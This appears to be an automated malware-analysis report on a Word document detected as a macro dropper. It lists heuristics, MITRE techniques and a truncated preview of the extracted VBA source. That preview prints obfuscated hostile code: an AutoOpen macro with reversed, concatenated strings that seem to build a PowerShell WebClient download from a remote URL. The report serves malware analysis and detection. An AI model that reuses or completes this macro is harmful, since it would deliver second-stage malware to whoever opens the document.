MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The Autoopen macro is present and likely initiates the execution of this malicious code. This suggests the document is designed to download and execute a second-stage payload, characteristic of a dropper malware.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6545065-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6545065-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 119559 bytes |
SHA-256: 6714ca0f5ce83b8905f25db98de267520ccfc48a78ebd645a55267339eda7e95 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LkViQkrkr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub rhOfD(jUSCmt)
WiDjjC = mkaYIz
ofcKUj = WKMBw
dkiTa = fwjhj + Sgn(22786 - KfGHqW - Fsoqs + Fix(36028)) - 19273 - CDbl(14470)
Trhltz = 3089
End Sub
Sub GzHTd(zvwtY)
QDWfuD = vnbHqY
PqzaiM = zAsOkb
qvtZlT = PVCrpN + Sgn(11254 - fqRvj - HwYKMK + Fix(31897)) - 5855 - CDbl(57001)
JbzEs = 64093
FEPzVz = szXhVC
ovwjwV = YISMr
hNQBaw = LqRpm + Sgn(99128 - SMmjhb - VjwVt + Fix(22410)) - 36927 - CDbl(63214)
zndMBi = 68825
HXumz = JwzjwM
iiQQM = Rfjmoi
UBInnn = QcKjhX + Sgn(3122 - YufWUa - INvpz + Fix(35127)) - 83168 - CDbl(51035)
FHDKHn = 22544
End Sub
Sub JkFGUj(ofcGlH)
KUFtv = zqKYBZ
aUrhki = NkUHod
ARpko = nziENs + Sgn(37427 - TZjEuI - UouVC + Fix(41746)) - 9220 - CDbl(50260)
zFSjzY = 39039
Nwnclm = sPquK
DtVCfc = OlHiXj
IZnwu = srwUj + Sgn(68436 - acnfK - KuLzd + Fix(33692)) - 92262 - CDbl(47923)
boEEB = 60591
End Sub
Sub Autoopen()
On Error Resume Next
ScrzE = LvAWwa
lwcYH = LwcJj
jSQKPb = XPKLoL + Sgn(22408 - jQwHV - EncMj + Fix(95384)) - 56265 - CDbl(37546)
qSKAX = 57947
rLbYzzjI (kkuODF + tvOcVOBbjuRCzX + noMvKc)
jCLcci = zjiEDA
sdKnk = fMNHSz
pYTBT = iJQzYv + Sgn(99263 - nBQJz - HuKCH + Fix(49785)) - 78368 - CDbl(99463)
oEJdS = 95955
End Sub
Sub PclMR(bdmsk)
sLwzTu = uNRut
jqbuO = hJNln
mmzTh = PpIGH + Sgn(84621 - qiODM - isKiTz + Fix(67262)) - 46049 - CDbl(51878)
WfZIY = 62662
GbjAf = tcijn
iTGAn = jcEdT
solmai = iJbHcj + Sgn(95128 - oRGlQ - AskPfl + Fix(6116)) - 85727 - CDbl(8658)
cHiIq = 35060
BAAFN = LiTqC
KwsDCs = BWvwfp
XiUwp = VJEkP + Sgn(80421 - kYlLvA - tFjEf + Fix(30194)) - 90421 - CDbl(32405)
GDUPIk = 64083
End Sub
Sub VAqWA(HnNFLc)
jAfpLR = PTZRFZ
huadzr = quKisL
QSJjoz = DpawS + Sgn(74561 - BbZQbv - tmcLlK + Fix(86307)) - 10856 - CDbl(40887)
TFSwB = 30762
End Sub
Attribute VB_Name = "RZbdFzhjEfpT"
Sub NQQBXf(XCodzU)
dNUwA = rzBUz
mufhfD = kwCpRa
iKOlz = kkDTkj + Sgn(78002 - tNPwD - smsVJZ + Fix(22731)) - 68721 - CDbl(36165)
XCVich = 71255
End Sub
Function tvOcVOBbjuRCzX()
On Error Resume Next
WRDCq = wvPdr
ntNrdv = tbXUB
cwhNJ = Mcwamj + Sgn(79754 - hYNKis - oipiBh + Fix(28766)) - 83955 - CDbl(79864)
wClOOP = 65307
nkomXi = fKiAcb
jRJIfj = nqvEYw
LiMPt = dqldU + Sgn(74628 - zmAWq - qcDsz + Fix(57615)) - 74880 - CDbl(13881)
uthwlW = 38634
iuUnbtWon = PqsUrK(".bIZ7Lej", 63406 + 2 - 63406, 63406 + 2 - 63406)
SkiLNt = fnsdiB
YOYGhI = MlGIdw
vWBjiK = lHocjX + Sgn(25690 - lJYwE - TZfpL + Fix(74157)) - 10391 - CDbl(98607)
DjzojR = 83296
zsNYn = RofQW
YElnU = msSfYL
trFfNi = PDHrGE + Sgn(25211 - jvjlc - hhckXF + Fix(56540)) - 25447 - CDbl(1220)
TBZtK = 23136
jFutS = PqsUrK("quKvB'K9;)'+'331'+'282 ,00001(t'+'xen.ds'+'ad'+'as'+'nVK9'+' ='+' BSNVK9;tneilCbe'+'W'+'.teN.metsyS )Z'+'W'+'Ut'+'cejbo-ZWU+ZW'+'UwZWU'+'+ZWUe'+'nZWU(. = UY'+'Kj", 95588 + 3 - 95588, 95588 + 154 - 95588)
SmiJV = thQVOM
znjSM = dupYO
CnXEf = NUlNw + Sgn(94583 - MkiDH - PAdUjS + Fix(12808)) - 64671 - CDbl(1945)
OcOQHS = 18583
kwAqK = Jzjhi
SaBij = ZdaiEF
UiMNIf = wLDINK + Sgn(88989 - XHNBiA - JrBzLj + Fix(70493)) - 56085 - CDbl(12289)
uGpjwl = 53387
GXFMAzo = PqsUrK("ILGz'K9 '+'='+' CDSVK9'+';'+')ZWU@ZWU(t'+'i'+'lp'+'S.ZWU/emjXq'+'Y/'+'owef/ed.ma'+'et'+'-p'+'e//:ptth@'+'/mG'+'Ko'+'z/m'+'oc.nhU.O", 42566 + 6 - 42566, 42566 + 121 - 42566)
zMGWt = ZthFT
CWjhY = MITEN
zOSDEL = WmAlof + Sgn(74517 - kaSwfJ - rXXHHb + Fix(48253)) - 36568 - CDbl(64461)
wYZfwV = 77676
wzimFZ = uKjPn
WOBGt = LzAIG
IinXb = kzkhzb + Sgn(93610 - fldsFO - TKzsaO + Fix(62190)) - 62171 - CDbl(69993)
rcdzqU = 43822
sICdTB = PqsUrK("NY%'+'mu'+'N-eciovn'+'I'+'/ten.s'3%rJS", 42665 + 6 - 42665, 42665 + 30 - 42665)
oinZpO = JGrZT
CrYoY = fBfETz
HzSppR = JRjwu + Sgn(41721 - TQIoGQ - okFISi + Fix(84161)) - 64469 - CDbl(16131)
UaCGaq = 32481
KOmkSH = jfYzT
QojwHH = GTcccn
qMmEjt = sYYsR + Sgn(44543
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.